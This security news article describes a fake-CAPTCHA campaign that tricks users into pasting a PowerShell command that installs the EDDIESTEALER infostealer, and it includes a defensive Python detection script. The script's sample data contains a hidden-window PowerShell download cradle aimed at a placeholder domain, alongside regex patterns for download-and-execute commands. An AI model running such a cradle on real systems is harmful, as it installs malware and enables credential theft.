Cybercriminals Exploit Fake CAPTCHA to Deploy EDDIESTEALER Malware

In a recent development, cybersecurity experts have identified a sophisticated malware campaign that utilizes deceptive CAPTCHA verification pages to distribute a newly discovered Rust-based infostealer named EDDIESTEALER. This campaign signifies a notable advancement in social engineering tactics, as attackers exploit users’ trust in standard security verification processes to execute malicious code.

Attack Methodology

The attack initiates when users visit compromised websites that display convincing fake "I'm not a robot" verification screens. These screens instruct users to perform a series of actions:

1. Press the Windows Key + R to open the Run dialog box.

2. Press Ctrl + V to paste clipboard contents.

3. Press Enter to execute the command.

Unbeknownst to the user, the malicious JavaScript has already copied a PowerShell command to their clipboard using the `document.execCommand('copy')` method. This command, when executed, initiates the download and execution of the EDDIESTEALER malware.

Technical Analysis

Elastic Security Labs analysts have observed that the campaign employs obfuscated React-based JavaScript payloads to present users with what appears to be legitimate Google reCAPTCHA verification interfaces. The PowerShell command executed by the user retrieves a JavaScript file named gverify.js from attacker-controlled domains, which subsequently downloads the main EDDIESTEALER executable with a pseudorandomly generated 12-character filename. This multi-layered approach effectively conceals the true nature of the attack while maintaining the appearance of legitimate system verification processes.
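Detection logic for the paste-and-run chain described above, as an added example that is not part of the original report: a Python scorer over process-creation records (Sysmon Event ID 1 field names) that flags PowerShell launched directly by explorer.exe, which is how a command entered in the Run dialog appears, combined with download-cradle indicators in the command line. The sample records, the domain and the file paths are constructed placeholders, not indicators from the campaign.

```python
import re

# Field names follow Sysmon Event ID 1. Signals of the Run-dialog chain: an
# interpreter whose parent is explorer.exe, plus a download cradle in the
# command line. Neither alone is reliable, so the scorer requires several.
SHELL_PARENTS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe"}
CRADLE_PATTERNS = {
    "download": re.compile(r"invoke-webrequest|\biwr\b|\bcurl\b|downloadstring|downloadfile", re.I),
    "execute": re.compile(r"invoke-expression|\biex\b|start-process", re.I),
    "hidden": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "script_fetch": re.compile(r"https?://\S+\.js\b", re.I),
}

def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def score_event(event: dict) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation record."""
    reasons = []
    if (basename(event.get("ParentImage", "")) in SHELL_PARENTS
            and basename(event.get("Image", "")) in INTERPRETERS):
        reasons.append("interpreter spawned directly by the desktop shell")
    cmd = event.get("CommandLine", "")
    for name, pattern in CRADLE_PATTERNS.items():
        if pattern.search(cmd):
            reasons.append(f"command line contains {name} indicator")
    return len(reasons), reasons

def find_suspects(events: list[dict], threshold: int = 3) -> list[tuple[int, int, list[str]]]:
    """Return (ProcessId, score, reasons) for records scoring at or above threshold."""
    hits = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            hits.append((event["ProcessId"], score, reasons))
    return hits

# Constructed sample records: a Run-dialog launch, a benign shortcut launch, a scheduled job.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "iwr https://captcha-check.invalid/gverify.js -OutFile $env:TEMP\gverify.js"'},
    {"ProcessId": 5208, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoExit -File C:\Scripts\backup.ps1"},
    {"ProcessId": 6010, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -Command "Invoke-WebRequest https://updates.example/manifest.json -OutFile C:\ProgramData\m.json"'},
]
```

Running `find_suspects(SAMPLE_EVENTS)` returns only the first record (score 4); the shortcut launch and the scheduled download each score 1, which is why the explorer.exe parent alone should not be alerted on.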

Data Theft Capabilities

EDDIESTEALER is designed to harvest a wide range of sensitive data, including:

– Credentials stored in browsers.

– Cryptocurrency wallet information.

– Password manager databases.

– FTP client configurations.

– Messaging application data.

The malware employs techniques similar to ChromeKatz to bypass application-bound encryption protections introduced in recent versions of Chrome, demonstrating its adaptability to modern browser security measures.

Evasion and Persistence Mechanisms

EDDIESTEALER utilizes multiple layers of obfuscation and evasion techniques, including:

– String Encryption: Extensive use of XOR ciphers with distinct key derivation functions, complicating static analysis efforts.

– API Obfuscation: A custom Windows API lookup mechanism that dynamically resolves function addresses, avoiding standard import tables.

These sophisticated techniques highlight the persistent threat posed by well-resourced cybercriminal organizations.

Recommendations for Users

To protect against such threats, users are advised to:

– Be Cautious with CAPTCHAs: Legitimate CAPTCHAs do not require users to execute system commands. If prompted to perform actions like opening the Run dialog box and pasting commands, do not proceed.

– Verify Website Authenticity: Ensure that the website requesting CAPTCHA verification is legitimate and trusted.

– Keep Software Updated: Regularly update operating systems, browsers, and security software to protect against known vulnerabilities.

– Use Security Solutions: Employ reputable antivirus and anti-malware solutions that can detect and prevent such threats.

By remaining vigilant and following these recommendations, users can significantly reduce the risk of falling victim to such sophisticated malware campaigns.